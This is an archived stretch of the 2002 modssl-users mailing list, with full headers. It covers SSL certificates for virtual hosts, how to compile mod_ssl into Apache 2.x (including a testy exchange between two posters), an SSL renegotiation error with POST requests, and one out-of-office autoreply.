>From: Cliff Woolley [mailto:jwoolley@apache.org]
>
>But please, people, this is SUCH a frequently asked question.  
>Definitely one of the top three. 

I'd say it is THE most frequently asked question (but I can't be
bothered scanning the archives to prove it :-)

The FAQ (http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47) is all very
well, but it is rather technical for a newbie and, having been written
by someone for whom English is a second language, is not as illuminating
as it might be. I had a go a re-writing it a few years ago
(http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2) so
maybe we could start there...

However, given the tendency of people to read the instructions only if
all else fails, putting a warning in the default config sounds like a
good idea. Putting an error message in the source-code would be even
better!

Rgds,

Owen Boyle

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 13:30:55 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA07687; Wed, 4 Dec 2002 13:29:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vopmail.pshift.com id NAA07679; Wed, 4 Dec 2002 13:28:59 +0100 (MET)
Received: from loki.asgaard.net (unverified [64.30.54.180]) by vopmail.pshift.com
 (Vircom SMTPRS 1.4.230) with ESMTP id  for ;
 Wed, 4 Dec 2002 07:25:29 -0500
Content-Type: text/plain;
  charset="iso-8859-1"
From: Justin Williams 
Organization: Natural Web Design
To: modssl-users@modssl.org
Subject: Re: how to add multiple SSL cert for each virtual host?
Date: Wed, 4 Dec 2002 07:26:44 +0000
User-Agent: KMail/1.4.3
References: <484A6CA492BE654395D208B1D8D5393972F73A@SOMEXEVS001.ex.ordersx.org>
In-Reply-To: <484A6CA492BE654395D208B1D8D5393972F73A@SOMEXEVS001.ex.ordersx.org>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200212040726.44030.justin@naturalwebs.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Justin Williams 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

A whole new error class!  RTFM errors and ID-10-T error codes alongside!  If 
nothing else, it would be thoroughly entertaining!

On Wednesday 04 December 2002 12:17 pm, Boyle Owen wrote:
> From: Cliff Woolley [mailto:jwoolley@apache.org]
>
> >But please, people, this is SUCH a frequently asked question.
> >Definitely one of the top three.
>
> I'd say it is THE most frequently asked question (but I can't be
> bothered scanning the archives to prove it :-)
>
> The FAQ (http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47) is all very
> well, but it is rather technical for a newbie and, having been written
> by someone for whom English is a second language, is not as illuminating
> as it might be. I had a go a re-writing it a few years ago
> (http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2) so
> maybe we could start there...
>
> However, given the tendency of people to read the instructions only if
> all else fails, putting a warning in the default config sounds like a
> good idea. Putting an error message in the source-code would be even
> better!
>
> Rgds,
>
> Owen Boyle
>
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 15:47:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA13496; Wed, 4 Dec 2002 15:46:12 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from toftum.dk id PAA13482; Wed, 4 Dec 2002 15:45:36 +0100 (MET)
Received: by toftum.dk (Postfix, from userid 1001)
	id E4B0A6E4062; Wed,  4 Dec 2002 15:51:01 +0100 (CET)
Date: Wed, 4 Dec 2002 15:51:01 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: how to add multiple SSL cert for each virtual host?
Message-ID: <20021204145101.GB23505@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <484A6CA492BE654395D208B1D8D5393972F73A@SOMEXEVS001.ex.ordersx.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <484A6CA492BE654395D208B1D8D5393972F73A@SOMEXEVS001.ex.ordersx.org>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Dec 04, 2002 at 01:17:12PM +0100, Boyle Owen wrote:
> >From: Cliff Woolley [mailto:jwoolley@apache.org]
> >
> >But please, people, this is SUCH a frequently asked question.  
> >Definitely one of the top three. 
> 
> I'd say it is THE most frequently asked question (but I can't be
> bothered scanning the archives to prove it :-)
> 
Yeah, I think so too.

> The FAQ (http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47) is all very
> well, but it is rather technical for a newbie and, having been written
> by someone for whom English is a second language, is not as illuminating
> as it might be. I had a go a re-writing it a few years ago
> (http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2) so
> maybe we could start there...
> 
Yes, I'll add it to the 2.x docs.

> However, given the tendency of people to read the instructions only if
> all else fails, putting a warning in the default config sounds like a
> good idea. Putting an error message in the source-code would be even
> better!
> 
I'm pretty sure there already is (at least in 1.3) but that requires
people to read the error_log.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 16:36:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA16278; Wed, 4 Dec 2002 16:35:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mamut.ies.se id QAA16254; Wed, 4 Dec 2002 16:34:57 +0100 (MET)
Received: from eugene [62.95.52.146] by mamut.ies.se
  (SMTPD32-5.05) id AFF7310200D2; Wed, 04 Dec 2002 16:32:07 +0100
From: "Johan Bryssling" 
To: 
Subject: Mod_ssl in apache 2.X
Date: Wed, 4 Dec 2002 16:34:51 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Johan Bryssling" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

I have a couple of questions:

If mod_ssl is included in apache2.x why doesnt it show up in the modulelist
when I use:

%> httpd -l

?

If it's not "included" when I "default" compile (using the INSTALL-file
instructions), how do I know how to compile in the mod_ssl into the apache
(if this is my first time)?

Where do I find information about these things, I certanly dont install
apache at a regulary basis.. ;-)

I noted a default config file for SSL (I also found an include into the
httpd.config-file) and used the command:

%>httpd -DSSL -k start

.. but it(apache) couldnt find the mod_ssl.. Why? If it's included I
shouldnt bother or?... Something I missed?

All help will be appricated.

Thanks...

/Johan

ps. Thinking of using Apache 1.3.7 instead due to the extended source of
good documentation...


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 16:54:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA16894; Wed, 4 Dec 2002 16:53:27 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id QAA16880; Wed, 4 Dec 2002 16:52:27 +0100 (MET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id KAA21674;
	Wed, 4 Dec 2002 10:52:59 -0500
Date: Wed, 4 Dec 2002 10:52:58 -0500 (EST)
From: "R. DuFresne" 
To: Johan Bryssling 
cc: modssl-users@modssl.org
Subject: Re: Mod_ssl in apache 2.X
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Didn't read any of the documentation in that tarball did ya?

   INSTALL

	[SNIP]

  For a short impression of what possibilities you have, here is a
  typical example which configures Apache for the installation tree
  /sw/pkg/apache with a particular compiler and flags plus the two
  additional modules mod_rewrite and mod_speling for later loading
  through the DSO mechanism:

     $ CC="pgcc" CFLAGS="-O2" \
     ./configure --prefix=/sw/pkg/apache \
     --enable-rewrite=shared \
     --enable-speling=shared

  The easiest way to find all of the configuration flags for Apache 2.0
  is to run ./configure --help.

	[SNIP]

The new apache is not the best as far as documentation concerns, certainly
not up to the documentation that the older apache with or without mod-ssl
integration, but, there is info to be gleened, if one looks.

How about the apache web pages, read that at all?

Now you have to do some work on your own, you can't expect others to do it
all for you and remain lazy.

Thanks,

Ron DuFresne

On Wed, 4 Dec 2002, Johan Bryssling wrote:

> Hi!
> 
> I have a couple of questions:
> 
> If mod_ssl is included in apache2.x why doesnt it show up in the modulelist
> when I use:
> 
> %> httpd -l
> 
> ?
> 
> If it's not "included" when I "default" compile (using the INSTALL-file
> instructions), how do I know how to compile in the mod_ssl into the apache
> (if this is my first time)?
> 
> Where do I find information about these things, I certanly dont install
> apache at a regulary basis.. ;-)
> 
> I noted a default config file for SSL (I also found an include into the
> httpd.config-file) and used the command:
> 
> %>httpd -DSSL -k start
> 
> .. but it(apache) couldnt find the mod_ssl.. Why? If it's included I
> shouldnt bother or?... Something I missed?
> 
> All help will be appricated.
> 
> Thanks...
> 
> /Johan
> 
> ps. Thinking of using Apache 1.3.7 instead due to the extended source of
> good documentation...
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 20:55:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA01491; Wed, 4 Dec 2002 20:54:23 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from denali.nightsource.com id UAA01440; Wed, 4 Dec 2002 20:53:16 +0100 (MET)
Received: from whitney.hackhawk.net (denali.nightsource.com [66.127.0.212] (may be forged))
	by denali.nightsource.com (8.11.0/8.11.0) with ESMTP id gB4JBGI25962
	for ; Wed, 4 Dec 2002 11:11:17 -0800
Message-Id: <5.1.0.14.0.20021204115044.02ea8160@localhost>
X-Sender:  (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 04 Dec 2002 11:56:15 -0800
To: modssl-users@modssl.org
From: Hack Hawk 
Subject: Re: how to add multiple SSL cert for each virtual host?
In-Reply-To: <200212040726.44030.justin@naturalwebs.com>
References: <484A6CA492BE654395D208B1D8D5393972F73A@SOMEXEVS001.ex.ordersx.org>
 <484A6CA492BE654395D208B1D8D5393972F73A@SOMEXEVS001.ex.ordersx.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hack Hawk 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 11:26 PM 12/03/2002, Justin Williams wrote:
>A whole new error class!  RTFM errors and ID-10-T error codes alongside!  If
>nothing else, it would be thoroughly entertaining!

In my defense, I ALWAYS RTFM before asking questions like this.  HOWEVER, 
in this case, the httpd.conf APPEARS to indicate that this type of 
configuration/support should be possible.  So, being the curious, technical 
type of person that I am, I'd probably just start trying to make it work 
even before RTFMing to find that it's not actually supported.  MUCH wasted 
time if I hadn't stumbled upon this conversation in this group.

I'm of the opinion that it would be "NICE" if there was some info about 
this in the httpd.conf file on top of the manual and FAQ's.  Note that I 
only say it would be "NICE".  I'd still end up going to the manual and FAQ 
before posting such a question.  I certainly don't mind the extra work, 
considering the absolutely awesome price of the product.  ;)

- hawk

>On Wednesday 04 December 2002 12:17 pm, Boyle Owen wrote:
> > From: Cliff Woolley [mailto:jwoolley@apache.org]
> >
> > >But please, people, this is SUCH a frequently asked question.
> > >Definitely one of the top three.
> >
> > I'd say it is THE most frequently asked question (but I can't be
> > bothered scanning the archives to prove it :-)
> >
> > The FAQ (http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47) is all very
> > well, but it is rather technical for a newbie and, having been written
> > by someone for whom English is a second language, is not as illuminating
> > as it might be. I had a go a re-writing it a few years ago
> > (http://marc.theaimsgroup.com/?l=apache-modssl&m=98559369910170&w=2) so
> > maybe we could start there...
> >
> > However, given the tendency of people to read the instructions only if
> > all else fails, putting a warning in the default config sounds like a
> > good idea. Putting an error message in the source-code would be even
> > better!
> >
> > Rgds,
> >
> > Owen Boyle
> >
> > This message is for the named person's use only. It may contain
> > confidential, proprietary or legally privileged information. No
> > confidentiality or privilege is waived or lost by any mistransmission.
> > If you receive this message in error, please notify the sender urgently
> > and then immediately delete the message and any copies of it from your
> > system. Please also immediately destroy any hardcopies of the message.
> > You must not, directly or indirectly, use, disclose, distribute, print,
> > or copy any part of this message if you are not the intended recipient.
> > The sender's company reserves the right to monitor all e-mail
> > communications through their networks. Any views expressed in this
> > message are those of the individual sender, except where the message
> > states otherwise and the sender is authorised to state them to be the
> > views of the sender's company.
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec  4 22:48:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA06943; Wed, 4 Dec 2002 22:47:02 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange-nt.intranet.siemens-itron.com.ar id WAA06919; Wed, 4 Dec 2002 22:45:46 +0100 (MET)
Received: by EXCHANGE-NT with Internet Mail Service (5.5.2653.19)
	id ; Wed, 4 Dec 2002 18:45:43 -0300
Message-ID: <728DED14DCADD611A05800508BDE83552F1279@EXCHANGE-NT>
From: Alejandro Dobniewski 
To: "'modssl-users@modssl.org'" 
Subject: ssl renegotiation in post not allowed?
Date: Wed, 4 Dec 2002 18:45:34 -0300 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alejandro Dobniewski 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello:
	I'm having a problem using client authentication with POST method. I
have an Apache 2.0.43, server side SSL works fine. The browser is an
internet explorer 6.0. When I requiere client side authentication I can't
POST any data. The error log follows:
[Wed Dec 04 15:27:09 2002] [notice] Apache/2.0.43 (Unix) mod_ssl/2.0.43
OpenSSL/0.9.6g mod_jk2/2.0.0 configured -- resuming normal operations
[Wed Dec 04 15:28:26 2002] [error] Re-negotiation handshake failed: Not
accepted by client!?
[Wed Dec 04 15:28:26 2002] [error] Spurious SSL handshake interrupt [Hint:
Usually just one of those OpenSSL confusions!?]
[Wed Dec 04 15:29:03 2002] [error] SSL Re-negotiation in conjunction with
POST method not supported!
hint: try SSLOptions +OptRenegotiate
[Wed Dec 04 15:29:07 2002] [error] SSL Re-negotiation in conjunction with
POST method not supported!
hint: try SSLOptions +OptRenegotiate
[Wed Dec 04 15:29:10 2002] [error] SSL Re-negotiation in conjunction with
POST method not supported!
hint: try SSLOptions +OptRenegotiate
[Wed Dec 04 15:58:30 2002] [notice] caught SIGTERM, shutting down

Of course we tried +OptRenegotiate but the problem persist. In Apache
changelog this lists as fixed as of version 2.0.37.  I have searched the
mailing list archives and internet and found similar problems but can't find
an answer.

I need to get this working as soon as posible.
Thanks in advance.

Alejandro Dobniewski
Siemens Itron Business Services S.A.
Desarrollo


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 11:41:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA12643; Thu, 5 Dec 2002 11:40:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mamut.ies.se id LAA12629; Thu, 5 Dec 2002 11:39:43 +0100 (MET)
Received: from eugene [62.95.52.146] by mamut.ies.se
  (SMTPD32-5.05) id AC35EAD00C8; Thu, 05 Dec 2002 11:36:37 +0100
From: "Johan Bryssling" 
Cc: 
Subject: RE: Mod_ssl in apache 2.X
Date: Thu, 5 Dec 2002 11:39:19 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Johan Bryssling" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

Im not here to quarrel with you kid. Im here to get some help, and your
insults are not helping very much.

I thought this was the modssl-users list for people with
not-so-much-expert-knowledge and not the linux-experts-with-nolife
mailinglist.

Im working under time pressure and cannot afford reading old documentation
all day and then guess how the latter versions work (but of course I have
read most of the old documentation anyway...).

If I understand the example below I could rewrite it:

CC="pgcc" CFLAGS="-O2" \
     ./configure --prefix=/sw/pkg/apache \
     --enable-ssl=shared
?

... and load "mod_ssl.so" dynamically with "Loadmodule" latter on? Right?
(Of course its right.. ;) )

"Now you have to do some work on your own, you can't expect others to do it
all for you and remain lazy."

You call me lazy and think you know me after one email, that's cute. ;) I
was asking a question and not hiring you or anybody else for a job. You even
didnt have to answer. Im not demanding anything. (This is the first time I
ask a usergroup a question at all, silly.)

"The new apache is not the best as far as documentation concerns, certainly
not up to the documentation that the older apache with or without mod-ssl
integration, but, there is info to be gleened, if one looks"

Right, I and other developers still havnt all day, thats why it exists
user-groups to ask someone who already knows and perhaps have some time over
for an clear answer.

If I had some time over myself I would be happy to contribute with some
quick-start-(dummy)-tutorials, because it's needed. Setting up Apache2 with
SSL must be one of the most common configurations... Perhaps I will
contribute in not-so-distance-future. ;)

Regards

/Johan







-----Original Message-----
From: R. DuFresne [mailto:dufresne@sysinfo.com]
Sent: den 4 december 2002 16:53
To: Johan Bryssling
Cc: modssl-users@modssl.org
Subject: Re: Mod_ssl in apache 2.X



Didn't read any of the documentation in that tarball did ya?

   INSTALL

	[SNIP]

  For a short impression of what possibilities you have, here is a
  typical example which configures Apache for the installation tree
  /sw/pkg/apache with a particular compiler and flags plus the two
  additional modules mod_rewrite and mod_speling for later loading
  through the DSO mechanism:

     $ CC="pgcc" CFLAGS="-O2" \
     ./configure --prefix=/sw/pkg/apache \
     --enable-rewrite=shared \
     --enable-speling=shared

  The easiest way to find all of the configuration flags for Apache 2.0
  is to run ./configure --help.

	[SNIP]

The new apache is not the best as far as documentation concerns, certainly
not up to the documentation that the older apache with or without mod-ssl
integration, but, there is info to be gleened, if one looks.

How about the apache web pages, read that at all?

Now you have to do some work on your own, you can't expect others to do it
all for you and remain lazy.

Thanks,

Ron DuFresne

On Wed, 4 Dec 2002, Johan Bryssling wrote:

> Hi!
>
> I have a couple of questions:
>
> If mod_ssl is included in apache2.x why doesnt it show up in the
modulelist
> when I use:
>
> %> httpd -l
>
> ?
>
> If it's not "included" when I "default" compile (using the INSTALL-file
> instructions), how do I know how to compile in the mod_ssl into the apache
> (if this is my first time)?
>
> Where do I find information about these things, I certanly dont install
> apache at a regulary basis.. ;-)
>
> I noted a default config file for SSL (I also found an include into the
> httpd.config-file) and used the command:
>
> %>httpd -DSSL -k start
>
> .. but it(apache) couldnt find the mod_ssl.. Why? If it's included I
> shouldnt bother or?... Something I missed?
>
> All help will be appricated.
>
> Thanks...
>
> /Johan
>
> ps. Thinking of using Apache 1.3.7 instead due to the extended source of
> good documentation...
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 15:23:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA07343; Thu, 5 Dec 2002 15:22:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hackberry.abnamro.com id PAA07322; Thu, 5 Dec 2002 15:21:44 +0100 (MET)
From: ilya.birman@abnamro.com
Received: from butternut.lasalle.na.abnamro.com (butternut [10.211.11.42])
	by hackberry.abnamro.com (ESMTP) with ESMTP id gB5ELRq11750
	for ; Thu, 5 Dec 2002 08:21:27 -0600 (CST)
Received: from aachir001.lasalle.na.abnamro.com (aachir001.lasalle.na.abnamro.com [10.211.10.118])
	by butternut.lasalle.na.abnamro.com (ESMTP) with ESMTP id gB5ELQO06568
	for ; Thu, 5 Dec 2002 08:21:27 -0600 (CST)
Subject: Ilya Birman/US/ABNAMRO/NL is out of the office.
To: modssl-users@modssl.org
Message-ID: 
Date: Thu, 5 Dec 2002 08:21:06 -0600
X-MIMETrack: Serialize by Router on AACHIR001/HUB/ABNAMRO/NL(Release 5.0.11  |July 24, 2002) at
 12/05/2002 08:22:29 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ilya.birman@abnamro.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I will be out of the office starting  12/05/2002 and will not return until
12/06/2002.

I am working in Service Center today
In case of emergency my cell phone number is 847 912 1912
pager 1409682@worldcom.com
Ilya.

---------------------------------------------------------------------------
This message (including any attachments) is confidential and may be
privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised
use or dissemination of this message in whole or in part is strictly
prohibited. Please note that e-mails are susceptible to change.
ABN AMRO Bank N.V. (including its group companies) shall not be liable for
the improper or incomplete transmission of the information contained in
this communication nor for any delay in its receipt or damage to your
system. ABN AMRO Bank N.V. (or its group companies) does not guarantee that
the integrity of this communication has been maintained nor that this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec  5 16:35:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA14553; Thu, 5 Dec 2002 16:34:40 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id QAA14502; Thu, 5 Dec 2002 16:33:23 +0100 (MET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 659592C277; Thu,  5 Dec 2002 07:24:15 -0800 (PST)
Date: Thu, 5 Dec 2002 07:24:15 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Mod_ssl in apache 2.X
Message-ID: <20021205152415.GA8852@rawbyte.com>
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


For mod_ssl on Apache 2.0 you may want to check also the secure server
chapter I have online, which contains step by step instructions

http://www.apacheworld.org/ty24/

Best regards

Daniel

> Hi!
> 
> Im not here to quarrel with you kid. Im here to get some help, and your
> insults are not helping very much.
> 
> I thought this was the modssl-users list for people with
> not-so-much-expert-knowledge and not the linux-experts-with-nolife
> mailinglist.
> 
> Im working under time pressure and cannot afford reading old documentation
> all day and then guess how the latter versions work (but of course I have
> read most of the old documentation anyway...).
> 
> If I understand the example below I could rewrite it:
> 
> CC="pgcc" CFLAGS="-O2" \
>      ./configure --prefix=/sw/pkg/apache \
>      --enable-ssl=shared
> ?
> 
> ... and load "mod_ssl.so" dynamically with "Loadmodule" latter on? Right?
> (Of course its right.. ;) )
> 
> "Now you have to do some work on your own, you can't expect others to do it
> all for you and remain lazy."
> 
> You call me lazy and think you know me after one email, that's cute. ;) I
> was asking a question and not hiring you or anybody else for a job. You even
> didnt have to answer. Im not demanding anything. (This is the first time I
> ask a usergroup a question at all, silly.)
> 
> "The new apache is not the best as far as documentation concerns, certainly
> not up to the documentation that the older apache with or without mod-ssl
> integration, but, there is info to be gleened, if one looks"
> 
> Right, I and other developers still havnt all day, thats why it exists
> user-groups to ask someone who already knows and perhaps have some time over
> for an clear answer.
> 
> If I had some time over myself I would be happy to contribute with some
> quick-start-(dummy)-tutorials, because it's needed. Setting up Apache2 with
> SSL must be one of the most common configurations... Perhaps I will
> contribute in not-so-distance-future. ;)
> 
> Regards
> 
> /Johan
> 
> 
> 
> 
> 
> 
> 
> -----Original Message-----
> From: R. DuFresne [mailto:dufresne@sysinfo.com]
> Sent: den 4 december 2002 16:53
> To: Johan Bryssling
> Cc: modssl-users@modssl.org
> Subject: Re: Mod_ssl in apache 2.X
> 
> 
> 
> Didn't read any of the documentation in that tarball did ya?
> 
>    INSTALL
> 
> 	[SNIP]
> 
>   For a short impression of what possibilities you have, here is a
>   typical example which configures Apache for the installation tree
>   /sw/pkg/apache with a particular compiler and flags plus the two
>   additional modules mod_rewrite and mod_speling for later loading
>   through the DSO mechanism:
> 
>      $ CC="pgcc" CFLAGS="-O2" \
>      ./configure --prefix=/sw/pkg/apache \
>      --enable-rewrite=shared \
>      --enable-speling=shared
> 
>   The easiest way to find all of the configuration flags for Apache 2.0
>   is to run ./configure --help.
> 
> 	[SNIP]
> 
> The new apache is not the best as far as documentation concerns, certainly
> not up to the documentation that the older apache with or without mod-ssl
> integration, but, there is info to be gleened, if one looks.
> 
> How about the apache web pages, read that at all?
> 
> Now you have to do some work on your own, you can't expect others to do it
> all for you and remain lazy.
> 
> Thanks,
> 
> Ron DuFresne
> 
> On Wed, 4 Dec 2002, Johan Bryssling wrote:
> 
> > Hi!
> >
> > I have a couple of questions:
> >
> > If mod_ssl is included in apache2.x why doesnt it show up in the
> modulelist
> > when I use:
> >
> > %> httpd -l
> >
> > ?
> >
